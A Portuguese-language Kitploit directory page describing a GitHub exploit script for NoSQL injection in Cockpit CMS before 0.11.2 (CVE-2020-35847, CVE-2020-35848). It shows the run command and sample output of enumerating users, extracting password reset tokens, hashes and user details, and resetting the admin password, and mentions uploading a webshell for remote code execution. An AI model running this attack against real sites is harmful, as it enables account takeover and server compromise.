Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-35847_CVE-2020-35848 — CVE-2020-35847, CVE-2020-35848: Account Takeover | Kitploit
Ferramentas/GitHubGitHub/w33vils/cve-2020-35847_cve-2020-35848
ReconhecimentoAtaques de SenhaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de Informações
GitHubw33vils/cve-2020-35847_cve-2020-35848

CVE-2020-35847_CVE-2020-35848

CVE-2020-35847, CVE-2020-35848: Account Takeover

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
21há 3 anosAinda não revisado
Compartilhar

Cockpit CMS Injeção NoSQL (CVE-2020-35847, CVE-2020-35848)

Cockpit CMS antes da versão 0.11.2 é vulnerável a uma vulnerabilidade de Injeção NoSQL em /auth/resetpassword e /auth/newpassword que permite a extração de tokens de redefinição de senha, o que possibilita a enumeração de detalhes do usuário, bem como a redefinição de senha.

Leia mais - https://swarm.ptsecurity.com/rce-cockpit-cms/

Este script python enumera usuários no sistema e redefine a senha.

Uso

root@kitploit:~
python3 exploit.py -u http://cockpit-site-url

O script primeiro enumera usuários no sistema.

root@kitploit:~
[+] http://cockpit-site-url: is reachable
[-] Attempting Username Enumeration (CVE-2020-35846) : 

[+] Users Found : ['admin', 'user1', 'user2', 'user3']

Então você pode escolher de qual usuário obter mais informações. Isso também gera tokens de redefinição para esse usuário, um requisito chave na redefinição de senha.

root@kitploit:~
[-] Get user details For : admin
[+] Finding Password reset tokens
         Tokens Found : ['rp-4e82b990aff752bfb1dc9845d5338f6e610d0608bb75e']
[+] Obtaining user information 
-----------------Details--------------------
         [*] user : admin
         [*] name : Admin
         [*] email : [email protected]
         [*] active : True
         [*] group : admin
         [*] password : $2y$10$6uQ2PXh4vShH.D4gw..WtO0NHQq7J36ugmwKNtJGzu9p9OqSEpVUW
         [*] i18n : en
         [*] _created : 1621655201
         [*] _modified : 1621655201
         [*] _id : 60a87ea165343539ee000300
         [*] _reset_token : rp-4e82b990aff752bfb1dc9845d5338f6e610d0608bb75e
         [*] md5email : a11eea8bf873a483db461bb169beccec
--------------------------------------------

Finalmente, você pode optar por redefinir a senha do usuário.

root@kitploit:~
[+] Do you want to reset the passowrd for admin? (Y/n): y
[-] Attempting to reset admin's password:
[+] Password Updated Succesfully!
[+] The New credentials for admin is: 
         Username : admin 
         Password : new_random_password

Você pode então optar por enviar um webshell para o componente /finder para obter RCE.

Baixar ferramenta